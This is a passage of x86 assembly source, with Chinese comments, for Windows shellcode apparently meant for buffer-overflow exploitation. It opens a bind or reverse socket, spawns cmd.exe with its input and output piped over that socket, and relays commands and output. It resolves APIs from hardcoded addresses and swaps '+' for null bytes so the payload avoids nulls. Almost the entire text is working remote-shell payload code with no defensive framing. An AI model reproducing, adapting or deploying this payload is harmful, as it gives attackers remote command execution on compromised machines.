    push edx;            ;//LPCTSTR lpszCommand.
    push eax;            ;//NULL;

    mov eax, [esi+SkOverflowFuncAddr.CreateProcessA];
    call eax;

    ;//CloseHandle( ShellStdinPipe);
    mov eax, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
    push eax;
    mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
    call eax;
    ;//CloseHandle( ShellStdoutPipe);
    mov eax, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
    push eax;
    mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
    call eax;

    pop eax;
    pop ebx;
    pop ecx;
    pop edx;
    pop esi;
    pop edi;

    mov esp, ebp;
    pop ebp;
    ;//memset( &si, 0, sizeof(STARTUPINFO));
    jmp run_actual5;
  ;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
    push ebp;
    mov ebp, esp;

    push esi;
    push edi;
    push edx;
    push ecx;
    push ebx;
    push eax;

    mov esi, FUNC_PARAM_1;
    mov edi, FUNC_PARAM_2;

    mov eax, [edi+Shell_Cmd_Pipe.msocket];
    push eax;
    mov eax, [esi+SkOverflowFuncAddr.closesocket];
    call eax;

    mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
    push eax;
    mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
    call eax;

    mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
    push eax;
    mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
    call eax;

    pop eax;
    pop ebx;
    pop ecx;
    pop edx;
    pop edi;
    pop esi;

    mov esp, ebp;
    pop ebp;
    jmp run_actual6_1;
  ;//_Recv_Write_Socket_Pipe(  SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
    push ebp;
    mov ebp, esp;

    xor eax, eax;
    mov ax, 2f0h;
    sub esp, eax; // 496bytes, use for char szTemp[240];

    push esi;
    push edi;
    push edx;
    push ecx;
    push ebx;

    mov esi, FUNC_PARAM_1; //SkOverflowFuncAddr *pAddr;
    mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;
    ;//dwBreak = 1
    lea edx, [ebp - size Recv_Write_Socket_Pipe_Data + Recv_Write_Socket_Pipe_Data.dwBreak];
    xor eax, eax;
    inc eax;
    mov [edx], eax;
    ;//监测 dwBreak == 0?
    lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwBreak];
    mov eax, [edx];
    test eax, eax;
    jz _Quit_While_Read_Data_Loop_1;

    ;//iLen = recv( newsocket, szTemp, sizeof(szTemp)-1, 0);
    xor eax, eax;
    push eax;
    mov al, SIZE_OF_TEMP_BUFFER;
    push eax;
    lea eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
    push eax;

    lea ebx, [edi+Shell_Cmd_Pipe.msocket];
    mov eax, [ebx];
    push eax;

    mov eax, [esi+SkOverflowFuncAddr.recv];
    call eax;

    cmp eax, -1;
    jne _NextStep_Receive_Test;

    push eax;
    pop edx;

    mov eax, [esi+SkOverflowFuncAddr.GetLastError];
    call eax;

    cmp ax, 10060; //timeout?
    je _Read_StdoutPipe;

    jmp _Quit_While_Read_Data_Loop; //error.
    test eax, eax; //eax == 0?
    je _Quit_While_Read_Data_Loop; //break;

    jng _Read_StdoutPipe;

    ;//if( iLen > 0)
    ;//WriteFile( hWritePipe, szTemp, iLen, &dwTemp, NULL)
    xor edx, edx;
    push edx; //NULL
    lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
    push ebx; //&dwTemp
    push eax; //iLen
    lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
    push ebx; //szTemp;
    mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
    push eax;

    mov eax, [esi+SkOverflowFuncAddr.WriteFile];
    call eax;

    test eax, eax;
    jz _Quit_While_Read_Data_Loop; //WriteFile(..) == 0, 失败,管套中断.
  ;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
    jmp _temp_3;

    jmp run_actual6;


    ;//PeekNamedPipe(hReadPipe,NULL,0,NULL,&dwTemp,NULL );
    xor eax, eax;
    push eax; //NULL
    lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
    push edx; //&dwTemp
    push eax; //NULL
    push eax; //0
    push eax; //NULL
    mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
    push eax; //hReadPipe

    mov eax, [esi+SkOverflowFuncAddr.PeekNamedPipe];
    call eax;

    mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
    test eax, eax;
    jz _No_Data_To_Read_Yet;

    ;//ReadFile( hReadPipe, szTemp, sizeof(szTemp), &dwTemp, NULL)
    xor eax, eax;
    push eax;  //NULL
    lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
    push edx;  //&dwTemp
    mov al, SIZE_OF_TEMP_BUFFER;
    push eax; //sizeof(szTemp);
    lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
    push edx; //szTemp;
    mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
    push eax; //hReadPipe

    mov eax, [esi+SkOverflowFuncAddr.ReadFile];
    call eax; //ReadFile.

    ;//if( ReadFile (...) == 0)? then quit.
    test eax, eax;
    je _Quit_While_Read_Data_Loop;

    ;//send( newsocket, szTemp, dwTemp, 0);
    xor eax, eax;
    push eax; //0
    mov eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
    push eax; //dwTemp;
    lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
    push edx; //szTemp;
    mov eax, [edi+Shell_Cmd_Pipe.msocket];
    push eax; //socket.

    mov eax, [esi+SkOverflowFuncAddr.send];
    call eax;

    cmp eax, -1;
    je _Quit_While_Read_Data_Loop;

    jmp _Read_StdoutPipe; //continue to read next data.
    jmp _While_Read_Data_Loop;


    pop ebx;
    pop ecx;
    pop edx;
    pop edi;
    pop esi;

    mov esp, ebp;
    pop ebp;
    jmp run_actual;
  ;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
    push ebp;
    mov ebp, esp;

    xor eax, eax;
    mov al, 0f0h;
    sub esp, eax; //开辟空间

    push esi;
    push edi;
    push edx;
    push ecx;
    push ebx;

    mov esi, FUNC_PARAM_1;
    mov edi, FUNC_PARAM_2;

    xor ebx,ebx;
    lea edi, [ebp-10h];

    ;//SecurityAttributes.lpSecurityDescriptor = NULL; //default ACL
    lea edx, [edi+SECURITY_ATTRIBUTES.lpSecurityDescriptor];
    mov [edx], ebx;
    ;//SecurityAttributes.bInheritHandle = TRUE;  //will inherit handle
    lea edx, [edi+SECURITY_ATTRIBUTES.bInheritHandle];
    inc ebx;
    mov [edx], ebx;
    ;//SecurityAttributes.nLength = sizeof(SECURITY_ATTRIBUTES);
    lea edx, [edi+SECURITY_ATTRIBUTES.nLength];
    mov bl, size SECURITY_ATTRIBUTES;
    mov [edx], ebx;

    xor ebx, ebx;
    ;//bResult = CreatePipe( &hReadPipe, &ShellStdoutPipe, &SecurityAttributes, 0);output into _FUNC_PARAM_2's variables.

    push edi; //save.

    push ebx;      //0
    push edi;      //&SecurityAttributes

    mov edi, FUNC_PARAM_2;
    lea edx, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
    mov [edx], ebx; //ShellStdoutPipe = 0;
    push edx;      //&ShellStdoutPipe
    lea edx, [edi+Shell_Cmd_Pipe.hReadPipe];
    push edx;;      //&hReadPipe
    mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
    call eax;

    pop edi; //restore.

    test eax, eax;
    je _Create_Pipe_Quit_Error;
    ;//Create Second Pipe.
    ;//CreatePipe( &ShellStdinPipe, &hWritePipe, &SecurityAttributes, 0);
    xor ebx, ebx;

    push ebx;      //0
    push edi;      //&SecurityAttributes

    mov edi, FUNC_PARAM_2;
    lea edx, [edi+Shell_Cmd_Pipe.hWritePipe];
    push edx;      //&hWritePipe
    lea edx, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
    mov [edx],ebx;
    push edx;      //&ShellStdinPipe

    mov eax, [esi+SkOverflowFuncAddr.CreatePipe];
    call eax;

    test eax, eax;
    je _Create_Pipe_Quit_Error;

    xor eax, eax;
    inc eax;
    jmp _Create_Pipe_Quit;

    xor eax, eax;
    jmp _Create_Pipe_Quit;

    pop ebx;
    pop ecx;
    pop edx;
    pop edi;
    pop esi;

    mov esp, ebp;
    pop ebp;
    lea esi, [esp];
    mov esi, [esi]; //ebx 是调用代码的地址
    xor ecx, ecx;
    mov cx,MyDataOffset;
    add esi, ecx; //esx 是未来 数据的地址.

    ;//ebp-0x2ff 处,是 szShellNeedFunc结构.
    lea edi, [ebp - szShellNeedFunc_OFFSET];
    push edi;

    ;//MyDebugAdd -----
    mov cx, _size_AllData;
    rep movsb;

    ;//还要包括 连接信息结构 的数据
    pop edi;
    push edi;

    ;//将'+'转换成 "/x00"
    ;//void _Convert_Add_Sign_To_Null_Sign(void *ptr, int iLen, DWORD dwOld, DWORD dwNew);
    xor ecx, ecx;
    push ecx;  //---参数4
    mov cl, '+';
    push ecx;  //---参数3
    mov cx, _size_szShellNeedFunc;
    push ecx;  //---参数2
    xor ebx, ebx;
    mov bl, String_Of_Data_Offset;
    add edi, ebx; //edi指向 真正的 szShellNeedFunc
    push edi;  //---参数1

    call _Convert_Add_Sign_To_Null_Sign;
    add esp, 10h;

    ;//从 szShellNeedFunc 取得 SkOverflowFuncAddr的地址
    ;//void _Get_Overflow_Addr_From_Shell_Func( SkOverflowFuncAddr *pSkOverflowFuncAddr, char *ShellNeedFuncStr, DWORD dwGetModuleHandleAddr, DWORD GetProcAddr)
    xor ecx, ecx;
    mov cx, _GetModuleHandle_Addr_Offset;
    mov esi, edi;
    add esi, ecx;
    mov eax, [esi+4]
    push eax;         ;//GetProcAddress_Addr
    mov eax, [esi];
    push eax;         ;//GetModuleHandle_Addr

    push edi;
    ;//ebp-0x1ff处,是 SkOverflowFuncAddr结构.
    lea esi, [ebp-SkOverflowFuncAddr_OFFSET];
    push esi;
    call _Get_Overflow_Addr_From_Shell_Func;
    add esp, 10h;

    pop edi;
    ;//创建 一个管套,监听一个端口/连接到一个ip:port,返回该管套.
    ;//SOCKET _Create_Bind_Connect_Socket_To_Port( SkOverflowFuncAddr *pFuncAddr, szShellNeedFunc *pNeedFunc);
    push edi;
    push esi;
    call _Create_Bind_Connect_Socket_To_Port;
    add esp, 8;

    test eax, eax;
    jz Main_Quit_Now; //socket 失败.

    lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];
    lea ebx, [edi + Shell_Cmd_Pipe.msocket];
    mov [ebx], eax; //保存结果到 msocket中.
    ;//BOOL _Create_Two_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
    push edi;
    push esi;
    call _Create_Two_Pipe;
    add esp, 8;

    test eax, eax;
    jz Main_Quit_Now;

    ;//now is ok.
    ;//在管套 pipe 上,运行进程 pStrCmd;
    ;//_Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe, LPCTSTR *pStrCmd);
    lea edi, [ebp-szShellNeedFunc_OFFSET];
    xor eax,eax;
    mov al, String_Of_Data_Offset; //cmd.exe命令行在数据中的偏移.
    add edi, eax;
    push edi; //"cmd.exe"的指针
    lea edi, [ebp-Shell_Cmd_Pipe_OFFSET];
    push edi;
    push esi;
    call _Create_Process_To_Handle;
    add esp, 0ch;

    ;//_Recv_Write_Socket_Pipe(  SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
    push edi;
    push esi;
    call _Recv_Write_Socket_Pipe;
    add esp, 8;

    ;//_Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
    push edi;
    push esi;
    call _Close_All_Communication_Pipe
    add esp, 8;

    xor eax, eax;
    push eax;
    lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
    mov eax, [edx+PROCESS_INFORMATION.hProcess];
    push eax;

    mov eax, [esi+SkOverflowFuncAddr.TerminateProcess];
    call eax;

Main_Quit_Now: ;//现在推出..
    ;//exit now.
    xor eax, eax;
    push eax;
    mov eax, [esi+ SkOverflowFuncAddr.ExitProcess];
    call eax;

    mov esp,ebp;
    pop ebp;

MyDataOffset equ $-call_back_Data_Offset; //call 函数,到这里的距离.

ConnectTypeOffset equ $-start;
ListenPortOffset equ ConnectTypeOffset+stConnectInfo.dwListenPort;
ConnectIP1Offset equ ConnectTypeOffset+stConnectInfo.dwIP1;
ConnectIP2Offset equ ConnectTypeOffset+stConnectInfo.dwIP2;
ConnectPortOffset equ ConnectTypeOffset+stConnectInfo.dwConnectPort;

MyConnectInfo stConnectInfo < 2, 0ffh, 0ffffh, 02010151h, 01250201h, 01a801c0h, 02010158h>

String_Of_Data_Offset equ $-MyConnectInfo;
ExecCommandOffset equ $-start;

szShellNeedFunc db 'cmd.exe+++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'
db '++++++++++++++++'

SHELL_NEED_FUNC_BODY_OFFSET equ $-szShellNeedFunc;//这个是shell函数和dll的偏移

db 02h
db 0eh, 'kernel32.dll+',    '+'
db 0eh
db 11h, 'TerminateProcess', '+'
db 0bh,  'CreatePipe',   '+'
db 10h, 'GetStartupInfoA',   '+'
db 0fh, 'CreateProcessA',   '+'
db 0eh, 'PeekNamedPipe',   '+'
db 0ch, 'GlobalAlloc',  '+'
db 0bh, 'WriteFile',  '++'
db 09h, 'ReadFile',  '+'
db 06h, 'Sleep',  '+'
db 0ch, 'ExitProcess',  '+'
db 0eh, 'GetLastError+', '+'
db 10h, 'DuplicateHandle', '+'
db 12h, 'GetCurrentProcess', '+'
db 0ch, 'CloseHandle','+'
db 0bh, 'ws2_32.dll', '+'
db 0bh
db 07h, 'socket',  '+'
db 05h, 'bind',  '+'
db 07h, 'listen',  '+'
db 07h, 'accept',  '+'
db 05h, 'send',  '+'
db 05h, 'recv',  '+'
db 0bh, 'setsockopt', '+'
db 0bh, 'WSAStartup', '+'
db 0ch, 'closesocket', '+'
db 08h, 'connect', '+'
db 0ch, 'gethostname', '+'
db '+++++++++++++++++++++'

_GetModuleHandle_Addr_Offset equ $-szShellNeedFunc
GetModuleHandleOffset equ $-start;

GetModuleHandleA_Addr dd 77e756dbh

GetProcAddressOffset equ $-start;
GetProcAddressA_Addr dd 77e7564bh

_size_szShellNeedFunc equ $-szShellNeedFunc+1
_size_AllData equ $-MyConnectInfo+1

_sk_Bind_ConnectShellCode endp

db '---------------------------------------------------------'
stDataSetOffset struct
  dwConnectType DD 0;
  dwListenPort DD 0;
  dwConnectIP1 DD 0;
  dwConnectIP2 DD 0;
  dwConnectPort DD 0;

  dwExecCommand DD 0;
  wSizeExecCommand DW 0;
  wReserv1 DW 0
  dwGetModuleHandle DD 0;
  dwGetProcAddress DD 0;
stDataSetOffset ends

_GetDataSetOffset_Value proc
  push ebp;
  mov ebp, esp;

  push esi;
  push edi;
  push edx;
  push ecx;
  push ebx;
  push eax;

  mov esi, FUNC_PARAM_1;

  lea edi, [esi+stDataSetOffset.dwConnectType];
  mov eax, ConnectTypeOffset;
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.dwListenPort];
  mov eax, ListenPortOffset;
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.dwConnectIP1];
  mov eax, ConnectIP1Offset;
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.dwConnectIP2];
  mov eax, ConnectIP2Offset;
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.dwConnectPort];
  mov eax, ConnectPortOffset;
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.dwExecCommand];
  mov eax, ExecCommandOffset;
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.wSizeExecCommand];
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.dwGetModuleHandle];
  mov eax, GetModuleHandleOffset;
  mov [edi], eax;

  lea edi, [esi+stDataSetOffset.dwGetProcAddress];
  mov eax, GetProcAddressOffset;
  mov [edi], eax;

  pop eax;
  pop ebx;
  pop ecx;
  pop edx;
  pop edi;
  pop esi;

  mov esp, ebp;
  pop ebp;

_GetDataSetOffset_Value endp








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